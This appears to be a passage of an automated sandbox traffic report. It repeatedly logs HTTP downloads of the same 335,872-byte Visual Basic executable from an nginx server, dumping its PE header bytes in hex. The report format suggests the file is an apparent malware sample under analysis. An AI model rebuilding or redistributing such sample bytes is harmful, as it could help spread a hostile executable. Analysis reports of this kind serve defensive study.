40 05 00 00 10 00 00 b8 7d 05 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 22 03 00 28 00 00 00 00 50 03 00 74 e2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 08 14 03 00 00 10 00 00 00 20 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 1b 00 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 74 e2 01 00 00 50 03 00 00 f0 01 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 60 1d f3 3e 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Sep 2022 12:54:22 GMTContent-Type: application/octet-streamContent-Length: 335872Last-Modified: Wed, 18 May 2022 22:16:07 GMTConnection: keep-aliveETag: "62857027-52000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b7 12 07 db f3 73 69 88 f3 73 69 88 f3 73 69 88 1a 6c 64 88 f2 73 69 88 52 69 63 68 f3 73 69 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6c ce e8 42 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 20 03 00 00 10 02 00 00 00 00 00 0c 11 00 00 00 10 00 00 00 30 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 03 00 04 00 00 00 00 00 00 00 00 40 05 00 00 10 00 00 b8 7d 05 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 22 03 00 28 00 00 00 00 50 03 00 74 e2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 08 14 03 00 00 10 00 00 00 20 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 1b 00 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 74 e2 01 00 00 50 03 00 00 f0 01 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 60 1d f3 3e 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Sep 2022 12:54:23 GMTContent-Type: application/octet-streamContent-Length: 335872Last-Modified: Mon, 23 May 2022 22:06:20 GMTConnection: keep-aliveETag: "628c055c-52000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b7 12 07 db f3 73 69 88 f3 73 69 88 f3 73 69 88 1a 6c 64 88 f2 73 69 88 52 69 63 68 f3 73 69 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6c ce e8 42 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 20 03 00 00 10 02 00 00 00 00 00 0c 11 00 00 00 10 00 00 00 30 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 03 00 04 00 00 00 00 00 00 00 00 40 05 00 00 10 00 00 b8 7d 05 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 22 03 00 28 00 00 00 00 50 03 00 74 e2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 08 14 03 00 00 10 00 00 00 20 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 1b 00 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 74 e2 01 00 00 50 03 00 00 f0 01 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 60 1d f3 3e 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Sep 2022 12:54:26 GMTContent-Type: application/octet-streamContent-Length: 335872Last-Modified: Mon, 23 May 2022 22:29:54 GMTConnection: keep-aliveETag: "628c0ae2-52000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b7 12 07 db f3 73 69 88 f3 73 69 88 f3 73 69 88 1a 6c 64 88 f2 73 69 88 52 69 63 68 f3 73 69 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6c ce e8 42 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 20 03 00 00 10 02 00 00 00 00 00 0c 11 00 00 00 10 00 00 00 30 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 03 00 04 00 00 00 00 00 00 00 00 40 05 00 00 10 00 00 b8 7d 05 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 22 03 00 28 00 00 00 00 50 03 00 74 e2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 08 14 03 00 00 10 00 00 00 20 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 1b 00 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 74 e2 01 00 00 50 03 00 00 f0 01 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 60 1d f3 3e 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Sep 2022 12:54:27 GMTContent-Type: application/octet-streamContent-Length: 335872Last-Modified: Wed, 18 May 2022 22:16:07 GMTConnection: keep-aliveETag: "62857027-52000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b7 12 07 db f3 73 69 88 f3 73 69 88 f3 73 69 88 1a 6c 64 88 f2 73 69 88 52 69 63 68 f3 73 69 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6c ce e8 42 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 20 03 00 00 10 02 00 00 00 00 00 0c 11 00 00 00 10 00 00 00 30 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 03 00 04 00 00 00 00 00 00 00 00 40 05 00 00 10 00 00 b8 7d 05 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 22 03 00 28 00 00 00 00 50 03 00 74 e2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 08 14 03 00 00 10 00 00 00 20 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 1b 00 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 74 e2 01 00 00 50 03 00 00 f0 01 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 60 1d f3 3e 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Sep 2022 12:54:28 GMTContent-Type: application/octet-streamContent-Length: 335872Last-Modified: Mon, 23 May 2022 22:06:20 GMTConnection: keep-aliveETag: "628c055c-52000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b7 12 07 db f3 73 69 88 f3 73 69 88 f3 73 69 88 1a 6c 64 88 f2 73 69 88 52 69 63 68 f3 73 69 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6c ce e8 42 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 20 03 00 00 10 02 00 00 00 00 00 0c 11 00 00 00 10 00 00 00 30 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 03 00 04 00 00 00 00 00 00 00 00 40 05 00 00 10 00 00 b8 7d 05 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 22 03 00 28 00 00 00 00 50 03 00 74 e2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 08 14 03 00 00 10 00 00 00 20 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 1b 00 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 74 e2 01 00 00 50 03 00 00 f0 01 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 60 1d f3 3e 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Sep 2022 12:54:30 GMTContent-Type: application/octet-streamContent-Length: 335872Last-Modified: Mon, 23 May 2022 22:29:54 GMTConnection: keep-aliveETag: "628c0ae2-52000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b7 12 07 db f3 73 69 88 f3 73 69 88 f3 73 69 88 1a 6c 64 88 f2 73 69 88 52 69 63 68 f3 73 69 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6c ce e8 42 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 20 03 00 00 10 02 00 00 00 00 00 0c 11 00 00 00 10 00 00 00 30 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 03 00 04 00 00 00 00 00 00 00 00 40 05 00 00 10 00 00 b8 7d 05 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 22 03 00 28 00 00 00 00 50 03 00 74 e2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 08 14 03 00 00 10 00 00 00 20 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 1b 00 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 74 e2 01 00 00 50 03 00 00 f0 01 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 60 1d f3 3e 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Sep 2022 12:54:30 GMTContent-Type: application/octet-streamContent-Length: 335872Last-Modified: Wed, 18 May 2022 22:16:07 GMTConnection: keep-aliveETag: "62857027-52000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b7 12 07 db f3 73 69 88 f3 73 69 88 f3 73 69 88 1a 6c 64 88 f2 73 69 88 52 69 63 68 f3 73 69 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6c ce e8 42 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 20 03 00 00 10 02 00 00 00 00 00 0c 11 00 00 00 10 00 00 00 30 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 03 00 04 00 00 00 00 00 00 00 00 40 05 00 00 10 00 00 b8 7d 05 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 22 03 00 28 00 00 00 00 50 03 00 74 e2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 08 14 03 00 00 10 00 00 00 20 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 1b 00 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 74 e2 01 00 00 50 03 00 00 f0 01 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 60 1d f3 3e 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 